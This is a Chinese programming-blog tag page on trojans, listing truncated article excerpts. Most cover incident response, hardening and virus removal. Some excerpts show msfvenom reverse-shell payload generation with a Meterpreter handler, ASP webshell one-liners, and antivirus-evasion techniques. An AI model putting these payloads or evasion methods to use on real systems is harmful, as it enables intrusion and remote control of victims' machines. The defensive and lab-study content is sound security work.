首页
编程日记
ChatGpt专题
LINUX学习
Java学习
前端教程
单片机
渗透测试
检测点
蓝桥杯
时间复杂度
汇编
目标检测
web大学生网页作业成品
遥感预处理
服务监控
EMC
TS工时表
自由工作
webGL
汉诺塔
Scratch编程
汇编大作业设计
php桶装水配送系统
dubbo
企业管理
亿图图示
木马
2024/4/13 2:00:02
警惕免杀版Gh0st木马!
https://github.com/SecurityNo1/Gh0st2023 经过调查发现,这款开源的高度免杀版Gh0st木马目前正在大范围传播,据称可免杀多种主流杀软:开发者不仅制作了新颖的下载页面,还设法增加了搜索引擎的收录权重,吸引了许多免…
阅读更多...
使用Msfvenom生成Ubuntu 64位木马(反向连接、正向连接)
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成反向连接木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux针对Ubuntu 64位靶机ÿ…
阅读更多...
火速卸载!Chrome 搜索 User-Agent Switcher 排行第一的插件竟是木马
近日,有开发者在 Google Chrome 商店中搜索 User-Agent Switcher(https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake) 这款扩展程序时,竟然发现排行第一(459604位用户)的“…
阅读更多...
服务器病毒木马通用排查处理应急响应流程
目录 一、勒索病毒发作的特征 二、勒索病毒的应急响应 三、勒索病毒预防与事后加固 一、勒索病毒发作的特征 如果发现大量统一后缀的文件;发现勒索信在Linux/home、/usr等目录,在Windows 桌面或者是被加密文件的文件夹下。如果存在以上特…
阅读更多...
【Web】小白友好的Java内存马基础学习笔记
目录 简介 文件马与内存马的比较 文件马原理 内存马原理 内存马使用场景 内存马分类 内存马注入方式 这篇文章主要是概念性的,具体技术细节不做探究,重点在祛魅。 简介 内存马(Memory Shellcode)是一种恶意攻击技术&…
阅读更多...
应急响应红蓝工程师白帽子取证Linux和windows入侵排查还原攻击痕迹,追溯攻击者,以及各种木马和病毒以及恶意脚本文件排查和清除
应急响应红蓝工程师白帽子取证Linux入侵排查还原攻击痕迹,追溯攻击者,以及各种木马和病毒以及恶意脚本文件排查和清除。 一般服务器被入侵的迹象,包括但不局限于:由内向外发送大量数据包(DDOS肉鸡)、服务器资源被耗尽(挖矿程序)、不正常的端口连接(反向shell等)、服务…
阅读更多...
网络攻防中nginx安全配置,让木马上传后不能执行、让木马执行后看不到非网站目录文件、命令执行后权限不能过高
网络攻防中nginx安全配置,让木马上传后不能执行、让木马执行后看不到非网站目录文件、命令执行后权限不能过高。 0x01 Nginx介绍 nginx本身不能处理PHP,它只是个web服务器,当接收到请求后,如果是php请求,则发给php解释器处理,并把结果返回给客户端。nginx一般是把请求发…
阅读更多...
病毒木马介绍
蠕虫病毒:蠕虫病毒是一种常见的计算机病毒。它是利用网络进行复制和传播,传染途径是通过网络和电子邮件。最初的蠕虫病毒定义是因为在DOS环境下,病毒发作时会在屏幕上出现一条类似虫子的东西,胡乱吞吃屏幕上的字母并将其改形。蠕虫…
阅读更多...
手工清除病毒注意点
在进行手工清除病毒时,我们需要一些辅助工具来提高效率,更准确的找到病毒木马并清除,例如autoruns、currports、procexp、urlsnoop等,这些相关工具的基本使用及一些判断方法已在之前的文档中有过介绍,不过除了辅助工具…
阅读更多...
webshell一句话木马大全
转载:来自WebShell’S Blog,地址:https://www.webshell.cc/2265.html 比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request(“sb”)%> 程序代码 <%execute request(“sb”)%> 程序代码 <…
阅读更多...
网络攻防中黑客是如何利用msfvenom生成木马的?如何生成多种跨平台语言的木马?如何实现木马隐藏和免杀?如何实现穿透反弹shell控制目标机器的?
网络攻防中黑客是如何利用msfvenom生成木马的?如何生成多种跨平台语言的木马?如何实现木马隐藏和免杀?如何实现穿透反弹shell控制目标机器的? 木马程序是一种客户机服务器程序,典型结构为客户端/服务器(Client/Server,C/S)模式,服务器端(被攻击的主机)程序在运行时…
阅读更多...
Wireshark Wget bot木马分析
爬虫和蜘蛛 黑盒测试,它涉及到外部攻击者用于获取足够信息的所有步骤,以便入侵应用或服务器的特定功能。作为每个 Web 渗透测试中侦查阶段的一部分,我们需要浏览器每个包含在网页中的链接,并跟踪它展示的每个文件。有一些工具能够…
阅读更多...
Meterpreter session 2 closed. Reason: Died 问题解决方法
问题描述 用msf生成Ubuntu 16.04的反向连接木马: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST172.16.252.129 LPORT1234 -f elf > shell.elf开启监听: msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_t…
阅读更多...
中了敲诈者病毒,文件恢复有可能吗?你长着一张被勒索木马敲诈的脸?
导语:勒索木马在天朝已经屡见不鲜,为了让更多无辜读者完美躲避勒索木马的袭击,360反病毒小组负责人、拥有长达9年恶意软件查杀经验的王亮来解密勒索木马。熟悉雷锋网(公众号:雷锋网)的读者可能知道,一个月前࿰…
阅读更多...
木马免杀(篇三)静态免杀方法
紧接上一篇,是通过 cs 生成 shellcode 并直接用python 调用动态链接库执行 shellcode 。 生成后的exe文件未进行任何处理。 现在学习一些可以绕过静态免杀的方法。即将文件上传到目标不会被杀软查杀,但这只是静态方面。 动态免杀方面还涉及到很多东西&…
阅读更多...
网站挂马检测及清除
介绍 很多网站都被挂过马,挂马即在获取服务器的部分权限或所有权限后,向网页文件中插入一段恶意代码,即挂马。这些恶意代码可以是浏览器漏洞的利用代码,也可以是赚取流量的代码,或者是盗取账号的代码。 URL Snooper …
阅读更多...
Web服务器管理系列:10、文件夹安全设置
NTFS格式磁盘分区出来之后文件夹就变得安全很多了,所以我们在格式化磁盘的时候一定要选择NTFS格式,而不要选择FAT32格式。 下面是NTFS格式的文件夹安全选项: FAT32格式的文件夹是没有安全选项的: NTFS权限的特点:权限累加、拒绝优先。 在安全选项下面有个高级按钮: 我们…
阅读更多...
CentOS7清除wnTKYg木马
今天偶然发现服务器cpu占用率一直是100%,top查看了发现是一个名为wnTKYg的进程。 网上查找说是一个挖矿木马,清理之后做个记录。 木马如下图: 尝试pkill -9 wnTKYg杀死进程,发现没过多久又出现了 感觉好恶心,中毒原…
阅读更多...
常见计算机病毒种类及特征介绍与分析
什么是计算机病毒 通俗来讲,计算机病毒是一个程序,一段可执行代码。它可以很快地通过网络、U盘等蔓延,又常常难以根除。它能影响计算机使用,并且具有破坏性,复制性和传染性。 病毒又分为很多种类,下面&…
阅读更多...
蓝队追踪者工具TrackAttacker,以及免杀马生成工具
蓝队追踪者工具TrackAttacker,以及免杀马生成工具。 做过防守的都知道大HW时的攻击IP量,那么对于这些攻击IP若一个个去溯源则显得效率低下,如果有个工具可以对这些IP做批量初筛是不是更好? 0x2 TrackAttacker获取 https://githu…
阅读更多...
简单快速的了解网站的安全情况
站长们最关心的问题,也是危害最大的,自己网站有没有被植入木马呢?如何最简单知道呢?下面给你们分享下最简单知道网站有没有被植入木马。 第一种方法: 在浏览器打开网址 http://webscan.360.cn/(如下图,正常…
阅读更多...